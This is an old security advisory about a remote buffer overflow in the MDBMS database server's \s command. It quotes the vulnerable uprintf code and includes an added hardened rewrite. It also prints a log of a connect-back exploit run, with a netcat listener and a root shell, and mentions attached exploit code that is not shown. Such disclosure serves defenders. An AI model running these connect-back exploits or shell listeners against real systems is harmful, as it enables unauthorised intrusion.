COMMAND
MDBMS
SYSTEMS AFFECTED
MDBMS 0.99b9 and below
PROBLEM
teleh0r found the following. MDBMS is a SQL database server
(currently) for UNIX systems. Version 0.99b9 and earlier versions
contain an exploitable buffer overflow in the handling of the \s
console command.
When a user passes large buffers to the server in the form of
multiple lines, these are appended to the end of each other. A
subsequent call to the \s command causes the overflow.
Below is the faulty code (from interface.cc):
void user::uprintf(char *s, ...)
{
    char b[10000];                    /* fixed-size stack buffer */
    int len=strlen(outbuf), newlen;   /* outbuf: accumulated per-connection output */
    va_list ap;
    va_start(ap,s);
    vsprintf(b,s,ap); <----           /* unbounded write into b: the overflow */
    va_end(ap);
    newlen=strlen(b);
    while (newlen+len+10>=outsize) outbuf=(char*)realloc(outbuf,outsize+=1000);
    strcat(outbuf,b);                 /* append formatted text to outbuf */
    FD_SET(fd,&parent->wmask);        /* mark the client fd as having output pending */
}
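As an added, defender-side example (not MDBMS code; struct conn, conn_init and safe_uprintf are hypothetical names standing in for the server's per-connection state), the same routine rewritten so that a line longer than the 10000-byte buffer is refused instead of smashing the stack, and so that a failed realloc cannot lose the output buffer:

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Hypothetical stand-in for the server's per-connection output state. */
struct conn {
    char  *outbuf;   /* accumulated output, flushed to the socket later */
    size_t outsize;  /* bytes currently allocated for outbuf */
};
int conn_init(struct conn *c)
{
    c->outsize = 1000;
    c->outbuf = calloc(c->outsize, 1);
    return c->outbuf ? 0 : -1;
}
/* Hardened counterpart of uprintf(): vsnprintf bounds the write into b and its
 * return value exposes truncation. Returns bytes appended, or a negative code. */
int safe_uprintf(struct conn *c, const char *fmt, ...)
{
    char b[10000];                       /* same stack buffer as the original */
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(b, sizeof b, fmt, ap);   /* never writes past b */
    va_end(ap);
    if (n < 0)
        return -1;                       /* encoding error */
    if ((size_t)n >= sizeof b)
        return -2;                       /* would have overflowed b: refuse */
    size_t newlen = (size_t)n, len = strlen(c->outbuf);
    while (newlen + len + 10 >= c->outsize) {
        char *p = realloc(c->outbuf, c->outsize + 1000);
        if (!p)
            return -3;                   /* old buffer stays valid */
        c->outbuf = p;
        c->outsize += 1000;
    }
    memcpy(c->outbuf + len, b, newlen + 1);   /* copy including the NUL */
    return n;
}
int main(void)
{
    struct conn c; char big[10001];
    if (conn_init(&c) != 0) return 1;
    memset(big, 'A', 10000); big[10000] = '\0';  /* constructed 10000-byte line */
    printf("short: %d\n", safe_uprintf(&c, "MDBMS V%s ready.", "0.99b9"));
    printf("long: %d (refused)\n", safe_uprintf(&c, "%s", big));
    free(c.outbuf);
    return 0;
}
```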
Exploit example:
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
Usage: ./mdbms-pms.pl -t <hostname> -b <back>
-t <hostname> : hostname to test
-b <back> : connect back to ip
-p <port> : port (default: 2223)
-d <delay> : delay before timeout
-o <offset> : offset
-h : return to heap
[teleh0r@localhost mdbms]$ nc -l -v -p 1337 &
[1] 2070
listening on [any] 1337 ...
[teleh0r@localhost mdbms]$ ./mdbms-pms.pl -t 127.1 -b localhost -h
-- Remote code execution exploit - MDBMS <= 0.99b
-- <teleh0r@digit-labs.org> - Copyright (c) 2001
-> Connected to: 127.1 / MDBMS V0.99b9 ready.
-> Address : 0x302027d / xor-mask: 0x2020202
-> Return : 0x80cfe76 / using the heap ...
-> Sending payload: ...
-> * Successfully sent payload - good luck!
connect to [127.0.0.1] from localhost.localdomain [127.0.0.1] 1189
[teleh0r@localhost mdbms]$ %
nc -l -v -p 1337
whoami; uname -mnrsp
root
Linux localhost.localdomain 2.4.2-2 i686 unknown
...
Exploit code attached (MIMED):
SOLUTION
mu-b also found a buffer overflow in the "create database" system.
This was actually caused by a sprintf that generated the name of
the management variable. This has been fixed: table and
database names can no longer be larger than 128 bytes.
Information about the overflows was sent to marty@hinttech.com.
He has now fixed the problems, and new versions of MDBMS can
be found at:
http://www.hinttech.com/mdbms/